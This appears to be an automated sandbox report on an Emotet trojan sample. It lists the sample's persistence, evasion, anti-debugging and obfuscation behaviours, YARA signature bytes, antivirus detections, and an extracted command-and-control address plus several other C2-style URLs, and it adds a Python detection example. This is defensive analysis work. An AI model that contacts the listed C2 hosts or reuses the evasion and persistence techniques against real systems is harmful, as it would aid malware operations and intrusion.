Source: 00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00401E27 NtAllocateVirtualMemory,0_2_00401E27
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00401E27 NtAllocateVirtualMemory,1_2_00401E27
Contains functionality to delete servicesShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E6CFE1 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,3_2_00E6CFE1
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E61D2B CreateProcessAsUserW,CreateProcessW,3_2_00E61D2B
Creates files inside the system directoryShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
Deletes files inside the Windows folderShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeFile deleted: C:\Windows\SysWOW64\rdsmethods.exe:Zone.IdentifierJump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0040128B0_2_0040128B
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0042560D0_2_0042560D
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_004197810_2_00419781
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00420E800_2_00420E80
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00414F9F0_2_00414F9F
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_022037A50_2_022037A5
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_022037A90_2_022037A9
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_02202F820_2_02202F82
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_0040128B1_2_0040128B
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_0042560D1_2_0042560D
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_004197811_2_00419781
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00420E801_2_00420E80
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00414F9F1_2_00414F9F
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_006130E42_2_006130E4
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_006130E82_2_006130E8
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_006128C12_2_006128C1
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00EB37A92_2_00EB37A9
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00EB37A52_2_00EB37A5
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00EB2F822_2_00EB2F82
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E530E43_2_00E530E4
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E530E83_2_00E530E8
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E528C13_2_00E528C1
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E637A53_2_00E637A5
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E637A93_2_00E637A9
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E62F823_2_00E62F82
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: String function: 0040A450 appears 54 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: String function: 004122AC appears 104 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: String function: 00409710 appears 62 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: String function: 0042722B appears 46 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: String function: 00406780 appears 86 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: String function: 0042AEE1 appears 42 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: String function: 004131CC appears 322 times
PE file contains strange resources
Source: pM54o4Q47b.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file name differs from the original file name in the version info
Source: pM54o4Q47b.exe, 00000000.00000000.1197666359.0000000000457000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameMSADODLG.EXE vs pM54o4Q47b.exe
Source: pM54o4Q47b.exe, 00000001.00000000.1207352553.0000000000457000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameMSADODLG.EXE vs pM54o4Q47b.exe
Source: pM54o4Q47b.exe, 00000001.00000002.1248947711.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs pM54o4Q47b.exe
Source: pM54o4Q47b.exe, 00000001.00000002.1248947711.0000000002EB0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs pM54o4Q47b.exe
Source: pM54o4Q47b.exe, 00000001.00000002.1248171819.0000000002DB0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs pM54o4Q47b.exe
Source: pM54o4Q47b.exe | Binary or memory string: OriginalFilenameMSADODLG.EXE vs pM54o4Q47b.exe
The sample's own version resource names it MSADODLG.EXE; the propsys.dll.mui and System.OriginalFileName strings come from resources of Windows components mapped into the process, not from the sample itself.
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe | Section loaded: windowscoredeviceinfo.dll (8 occurrences)
Yara signature match
Source: 00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.1208704622.0000000002201000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet, author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification label
Source: classification engine | Classification label: mal100.bank.troj.evad.winEXE@7/1@1/13
Contains functionality to create services
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E6D0B1 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Contains functionality to enum processes or threads
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_02201943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_0040A300 CoCreateInstance,OleRun,CoCreateInstance
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_00426769 FindResourceA,LoadResource,LockResource
Contains functionality to modify services (start/stop/modify)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E6D0B1 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Creates files inside the user directory
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Creates mutexes
Source: C:\Windows\SysWOW64\rdsmethods.exe | Mutant created: \BaseNamedObjects\Global\I4E4815C3
PE file has an executable .text section and no other executable section
Source: pM54o4Q47b.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Sample is known by Antivirus
Source: pM54o4Q47b.exe | Virustotal: Detection: 76%
Source: pM54o4Q47b.exe | ReversingLabs: Detection: 80%
Sample requires command line parameters (based on API chain)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_0-24584)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_2-4590)
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\pM54o4Q47b.exe 'C:\Users\user\Desktop\pM54o4Q47b.exe'
Source: unknown | Process created: C:\Users\user\Desktop\pM54o4Q47b.exe --3386359c
Source: unknown | Process created: C:\Windows\SysWOW64\rdsmethods.exe C:\Windows\SysWOW64\rdsmethods.exe
Source: unknown | Process created: C:\Windows\SysWOW64\rdsmethods.exe --1fb03223
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Process created: C:\Users\user\Desktop\pM54o4Q47b.exe --3386359c
Source: C:\Windows\SysWOW64\rdsmethods.exe | Process created: C:\Windows\SysWOW64\rdsmethods.exe --1fb03223
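The launch chain listed under "Spawns processes" above, turned into detection logic as an added example (this is not Joe Sandbox code and not code from the sample). It runs over constructed process-creation events modelled on those lines; the PIDs and the parent link from the second pM54o4Q47b.exe instance to rdsmethods.exe are assumptions, since the report prints only image paths and command lines. The function names are the example's own.

```python
"""Added example, not code from Joe Sandbox or from the sample: detection
logic for the launch chain in the report's 'Spawns processes' block, run
over constructed process-creation events modelled on those lines.  PIDs and
the parent link 1001 -> 1002 are assumptions.
"""
import re
from dataclasses import dataclass

# Each binary in the report re-executes its own image once with a single
# argument of the form --<8 hex digits> (--3386359c for the dropper,
# --1fb03223 for rdsmethods.exe).  The value differs per binary, so the
# detection keys on the shape of the argument, not on its value.
HEX_ARG = re.compile(r"^--[0-9a-f]{8}$")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable image
    cmdline: str    # command line as the sandbox rendered it


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _arguments(cmdline: str) -> list[str]:
    """Tokenise the rendered command line and drop argv[0].  The sandbox
    wraps the first launch's argv[0] in single quotes, so quoted tokens
    are kept whole."""
    tokens = re.findall(r"'[^']*'|\S+", cmdline)
    return [t.strip("'") for t in tokens[1:]]


def self_relaunch_with_hex_arg(events: list[ProcEvent]) -> list[tuple[int, int, str]]:
    """(parent pid, child pid, argument) for each child that runs the same
    image as its parent with exactly one --xxxxxxxx argument."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or _basename(parent.image) != _basename(e.image):
            continue
        args = _arguments(e.cmdline)
        if len(args) == 1 and HEX_ARG.match(args[0]):
            hits.append((parent.pid, e.pid, args[0]))
    return hits


def user_binary_launching_windows_copy(events: list[ProcEvent]) -> list[tuple[int, int]]:
    """(parent pid, child pid) where a binary under the user profile starts
    a differently named executable under the Windows directory: the
    dropper -> rdsmethods.exe step, which the report records as a PE file
    moved into the SysWOW64 directory and then started."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        if (parent.image.lower().startswith("c:\\users\\")
                and e.image.lower().startswith("c:\\windows\\")
                and _basename(parent.image) != _basename(e.image)):
            hits.append((parent.pid, e.pid))
    return hits


# Constructed events modelled on the report's process list (PIDs and the
# 1001 -> 1002 parent link are assumptions).
EVENTS = [
    ProcEvent(1000, 1, r"C:\Users\user\Desktop\pM54o4Q47b.exe",
              r"'C:\Users\user\Desktop\pM54o4Q47b.exe'"),
    ProcEvent(1001, 1000, r"C:\Users\user\Desktop\pM54o4Q47b.exe",
              r"C:\Users\user\Desktop\pM54o4Q47b.exe --3386359c"),
    ProcEvent(1002, 1001, r"C:\Windows\SysWOW64\rdsmethods.exe",
              r"C:\Windows\SysWOW64\rdsmethods.exe"),
    ProcEvent(1003, 1002, r"C:\Windows\SysWOW64\rdsmethods.exe",
              r"C:\Windows\SysWOW64\rdsmethods.exe --1fb03223"),
    # Windows' own service host from the report; not part of the chain.
    ProcEvent(1004, 1, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\system32\svchost.exe -k wusvcs -p"),
]

if __name__ == "__main__":
    print(self_relaunch_with_hex_arg(EVENTS))          # two self-relaunches
    print(user_binary_launching_windows_copy(EVENTS))  # the drop-and-start step
```

To use this against real telemetry, map your endpoint's process-creation records (pid, parent pid, image path, command line) onto ProcEvent; the two checks are independent, and a host where both fire for the same chain reproduces exactly the sequence the report shows.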
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_00401D1C LoadLibraryW,GetProcAddress
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_004131CC push eax; ret (0_2_004131EA)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_00412460 push eax; ret (0_2_0041248E)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_004131CC push eax; ret (1_2_004131EA)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_00412460 push eax; ret (1_2_0041248E)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 2_2_0061E466 push 0000000Bh; iretd (2_2_0061E468)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 2_2_0061EA4A push es; iretd (2_2_0061EA4C)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 2_2_0061EB69 push es; iretd (2_2_0061EB80)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 2_2_0061EBDB push es; iretd (2_2_0061EBF8)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E5E466 push 0000000Bh; iretd (3_2_00E5E468)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E5EA4A push es; iretd (3_2_00E5EA4C)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E5EBDB push es; iretd (3_2_00E5EBF8)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E5EB69 push es; iretd (3_2_00E5EB80)

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\rdsmethods.exe | Executable created and started: C:\Windows\SysWOW64\rdsmethods.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | PE file moved: C:\Windows\SysWOW64\rdsmethods.exe

Boot Survival:

Contains functionality to start windows services
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E6D0B1 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | File opened: C:\Windows\SysWOW64\rdsmethods.exe:Zone.Identifier (access: read attributes, delete)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_0040B278 IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_0040A5E0 IsIconic
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_0041E630 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_0041EDE0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_0040B278 IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_0040A5E0 IsIconic
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_0041E630 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_0041EDE0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Process information set: NOOPENFILEERRORBOX (6 occurrences)

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_2-4688)
Query firmware table information (likely to detect VMs)
Source: C:\Windows\System32\svchost.exe | System information queried: FirmwareTableInformation (2 occurrences)
Contains functionality to enumerate running services
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E6CE15 EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | API coverage: 3.1 %
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | API coverage: 2.6 %
Source: C:\Windows\SysWOW64\rdsmethods.exe | API coverage: 9.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 4816 | Thread sleep time: -60000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Checks the free space of harddrives
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_00427F56 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_00427F56 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: svchost.exe, 00000008.00000002.1535306523.0000017882460000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000008.00000002.1534999851.0000017881EB6000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000008.00000002.1535306523.0000017882460000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000008.00000002.1535306523.0000017882460000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000008.00000002.1535306523.0000017882460000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Every entry in this section attributed to svchost.exe (the firmware table query, the sleep, PhysicalDrive0 and the five Hyper-V strings) comes from process 8, the Windows service host the report lists as started with -k wusvcs -p, not from pM54o4Q47b.exe or rdsmethods.exe; the strings are Windows' own Hyper-V Host Compute Service message texts. Only the rdsmethods.exe and pM54o4Q47b.exe entries here are evidence about the malware.
Program exit points
Source: C:\Windows\SysWOW64\rdsmethods.exe | API call chain: ExitProcess graph end node (graph_2-4620)
Source: C:\Windows\SysWOW64\rdsmethods.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rdsmethods.exe | API call chain: ExitProcess graph end node
Queries a list of all running processes
Source: C:\Windows\SysWOW64\rdsmethods.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_00401D1C LoadLibraryW,GetProcAddress
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_0040107E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_022012CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_02201E04 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_0040107E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 2_2_00610467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 2_2_00610C0C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 2_2_00611743 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 2_2_00EB12CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 2_2_00EB1E04 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E50467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E50C0C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E51743 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E612CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E61E04 mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_022014F2 GetProcessHeap,RtlAllocateHeap
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_00416EB6 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_00416EC8 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_00416EB6 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_00416EC8 SetUnhandledExceptionFilter

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_0220D838 cpuid
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rdsmethods.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query time zone information
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_004177F5 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
Contains functionality to query windows version
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_0042B7F5 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match | File source: 00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp, type: MEMORY

Malware Configuration

Threatname: Emotet

{"C2 list": ["50.116.86.205/srvc"]}

Behavior Graph


Simulations

Behavior and APIs

Time | Type | Description
09:37:17 | API Interceptor | 2x Sleep call for process: svchost.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
pM54o4Q47b.exe | 76% | Virustotal |
pM54o4Q47b.exe | 81% | ReversingLabs | Win32.Trojan.Emotet
pM54o4Q47b.exe | 100% | Avira | TR/AD.Emotet.dcjla

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.pM54o4Q47b.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1045699
3.2.rdsmethods.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1045699
0.0.pM54o4Q47b.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.dcjla
1.0.pM54o4Q47b.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.dcjla
3.0.rdsmethods.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.dcjla
2.0.rdsmethods.exe.400000.0.unpack | 100% | Avira | TR/AD.Emotet.dcjla
2.2.rdsmethods.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1045699
1.2.pM54o4Q47b.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1045699

Domains

Source | Detection | Scanner | Label
cdn.onenote.net | 1% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://206.81.10.215:8080/scripts/rtm/xian/ | 0% | Avira URL Cloud | safe
http://wellformedweb.org/CommentAPI/ | 1% | Virustotal |
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://206.189.112.148:8080/pnp/ | 6% | Virustotal |
http://206.189.112.148:8080/pnp/ | 0% | Avira URL Cloud | safe
http://51.68.220.244:8080/rtm/teapot/ | 0% | Avira URL Cloud | safe
http://50.116.86.205/srvc/enabled/xian/ | 0% | Avira URL Cloud | safe
http://50.116.86.205:8080/srvc/enabled/xian/ | 0% | Avira URL Cloud | safe

Note that 50.116.86.205/srvc is the C2 extracted from the sample's configuration (see Malware Configuration above); a 0% or "safe" reputation verdict only means the URL was absent from that feed at analysis time, not that it is benign.

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
    Strings: 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0
             0x5a13:$snippet6: 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 ...
00000000.00000002.1208704622.0000000002201000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
    Strings: 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 21 02 85 C0
             0x50d4:$snippet6: 33 C0 21 05 4C 25 21 02 A3 48 25 21 02 39 05 70 F3 20 02 74 18 40 A3 48 25 21 02 83 3C C5 70 F3 ...
